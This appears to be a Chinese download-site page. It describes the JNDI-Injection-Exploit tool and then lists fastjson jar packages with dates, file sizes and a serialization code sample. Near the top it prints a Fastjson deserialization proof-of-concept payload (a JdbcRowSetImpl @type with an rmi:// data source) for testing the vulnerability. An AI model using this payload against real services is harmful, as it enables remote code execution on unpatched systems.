JNDI注入漏洞
描述
JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。
使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。
例如,这是一个Fastjson vul-poc:
{ " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true }
我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。
免责声明
所有信
2021-12-10 15:44:11
365KB
1
阿里巴巴 JSON解析jar包 fastjson,测试表明,fastjson具有极快的性能,超越任其他的Java Json parser
更新时间 2015年10月 27日
2021-11-30 11:16:43
251KB
1
阿里巴巴FastJson是一个Json处理工具包,包括“序列化”和“反序列化”两部分,它具备如下特征:速度最快,测试表明,fastjson具有极快的性能,超越任其他的JavaJson
2021-11-26 14:57:00
501KB
1
整个压缩包中,有43个jar包,有json数据需要的,有经纬度转换需要的,有字符串转换成拼音的,有websocket需要的。。。。有需要的朋友可以下载用,应该不用积分的
2021-11-15 11:59:41
17.87MB
1
fastjson 1.1.41 jar 包,JSONObject jsonObj = JSONObject.fromObject(jsonStr);
2021-11-08 15:59:04
350KB
1
fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器,来自阿里巴巴的工程师开发。主要特点:快速FAST (比其它任何基于Java的解析器和生成器更快,包括jackson)强大(支持普通JDK类包括任意Java Bean Class、Collection、Map、Date或enum)零依赖(没有依赖其它任何类库除了JDK)示例代码:import com.alibaba.fastjson.JSON;
Group group = new Group();
group.setId(0L);
group.setName("admin");
User guestUser = new User();
guestUser.setId(2L);
guestUser.setName("guest");
User rootUser = new User();
rootUser.setId(3L);
rootUser.setName("root");
group.getUsers().add(guestUser);
group.getUsers().add(rootUser);
String jsonString = JSON.toJSONString(group);
System.out.println(jsonString);
标签:fastjson json 阿里巴巴
2021-11-06 00:26:39
3.82MB
1
2020年全国大学生软件测试大赛总决赛赛,开发者测试赛项中,“FastJson”题目资源下载,可直接导入eclipse运行。本题使用的源码来自github开源代码,包含开源Json解析库FastJson的一部分代码的测试,在安装mooctest插件的eclipse中可以查看自己的行覆盖和分支覆盖以及成绩。
2021-10-21 15:29:52
20KB
1
fastjson-1.2.31的官方jar包合集包含文档
2021-10-20 22:04:30
1.5MB
1